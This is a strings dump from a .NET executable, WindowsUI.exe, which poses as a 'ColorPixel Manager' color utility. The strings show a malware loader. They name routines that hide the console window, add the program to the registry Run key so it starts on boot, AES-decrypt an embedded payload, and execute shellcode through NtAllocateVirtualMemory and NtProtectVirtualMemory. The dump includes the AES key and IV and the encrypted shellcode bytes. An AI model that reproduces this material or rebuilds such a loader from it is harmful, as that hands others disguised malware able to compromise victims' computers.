!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Microsoft.Win32
MicrosoftWin32
<Module>
SW_HIDE
WindowsUI
System.IO
DecryptAES
get_IV
set_IV
encryptedData
mscorlib
set_Mode
PaddingMode
CryptoStreamMode
CipherMode
LoadAndExecuteShellcode
shellcode
get_Message
Invoke
IDisposable
get_Handle
RuntimeTypeHandle
GetTypeFromHandle
processHandle
Console
WriteLine
allocationType
Dispose
Create
Delegate
GuidAttribute
NeutralResourcesLanguageAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
ToByte
SetValue
WindowsUI.exe
regionSize
set_Padding
System.Runtime.Versioning
String
Marshal
kernel32.dll
user32.dll
ntdll.dll
CryptoStream
MemoryStream
Program
System
SymmetricAlgorithm
ICryptoTransform
get_Location
Action
System.Reflection
Exception
CopyTo
SetRegistryStartup
CurrentUser
GetDelegateForFunctionPointer
CreateDecryptor
UIntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
DebuggingModes
GetCurrentProcess
baseAddress
zeroBits
Concat
Format
Object
oldProtect
newProtect
protect
Convert
GetConsoleWindow
ShowWindow
nCmdShow
HexStringToByteArray
ToArray
get_Key
set_Key
OpenSubKey
RegistryKey
System.Security.Cryptography
GetExecutingAssembly
NtAllocateVirtualMemory
NtProtectVirtualMemory
Registry
WrapNonExceptionThrows
WindowsUI
WindowsUI Color
ColorPixel Manager
Market Pixel
WindowsUI@Company
1.1.1.1
$066ae8d4-4a6d-40f5-9984-469d0d87aaa2
1.0.0.0
.NETFramework,Version=v4.7.2
FrameworkDisplayName
.NET Framework 4.7.2
C:\Users\H3OX\source\repos\WindowsUI\obj\Debug\WindowsUI.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
01,02,03,04,05,06,07,08,09,0a,0b,0c,0d,0e,0f,10
00,01,02,03,04,05,06,07,08,09,0a,0b,0c,0d,0e,0f
0xa4,0x36,0x2a,0x19,0x31,0x23,0xc1,0xe8,0xe1,0x20,0xda,0xc5,0xc9,0x7b,0x51,0xf5,0x0e,0x13,0x16,0xdb,0xcc,0x9b,0x89,0x4c,0xca,0xf3,0x24,0x3b,0x47,0x71,0x66,0x8d,0xa2,0xfa,0xff,0x77,0x56,0x64,0x2c,0x3f,0xa7,0xc2,0xf0,0x50,0x0a,0x20,0x6a,0xe9,0x75,0x55,0xdb,0xc0,0x1e,0x72,0x5f,0x28,0xd4,0x4a,0xda,0x3e,0x50,0xaa,0xca,0x44,0xb5,0x4d,0xbc,0x8e,0xe0,0xdb,0x88,0x7c,0x8b,0x88,0xa0,0x9a,0x81,0xdf,0x59,0x76,0x0a,0x8a,0xbd,0x32,0x0d,0xd0,0xe0,0x95,0x43,0xb4,0x0f,0x7b,0x6c,0x48,0x93,0x39,0x63,0x2f,0xfc,0x21,0x94,0x35,0xdb,0x77,0x90,0xfe,0x17,0x1c,0x28,0x4b,0xc3,0x66,0x7d,0x49,0x37,0xfe,0x33,0x95,0x5c,0xcc,0xec,0x9c,0x43,0xfe,0xe7,0x0b,0xb0,0x8d,0x98,0xe9,0x45,0x1b,0xce,0xf6,0xce,0x56,0x38,0xa9,0xa8,0x0a,0x93,0xf5,0xf5,0xbd,0xea,0xb3,0xb7,0x6f,0xdb,0x3f,0x24,0x6b,0x4b,0xe5,0xa0,0xdd,0x10,0x1e,0x79,0xfb,0xa4,0x5d,0xcc,0x60,0x66,0x27,0xe9,0x48,0x8c,0xb4,0x3b,0xd9,0x62,0x59,0xfa,0xea,0x96,0x12,0xf6,0xd0,0x03,0xf6,0xab,0x74,0x96,0x1b,0x33,0x22,0xba,0x4e,0x75,0x5c,0xab,0x9c,0xe8,0xf1,0xea,0xa3,0x40,0x06,0x32,0xad,0xd5,0x05,0x1a
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Failed to set registry startup:
Memory allocation failed. NTSTATUS: {0}
Failed to change memory protection. NTSTATUS: {0}
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
WindowsUI Color
CompanyName
ColorPixel Manager
FileDescription
WindowsUI
FileVersion
1.0.0.0
InternalName
WindowsUI.exe
LegalCopyright
WindowsUI@Company
LegalTrademarks
1.1.1.1
OriginalFilename
WindowsUI.exe
ProductName
Market Pixel
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0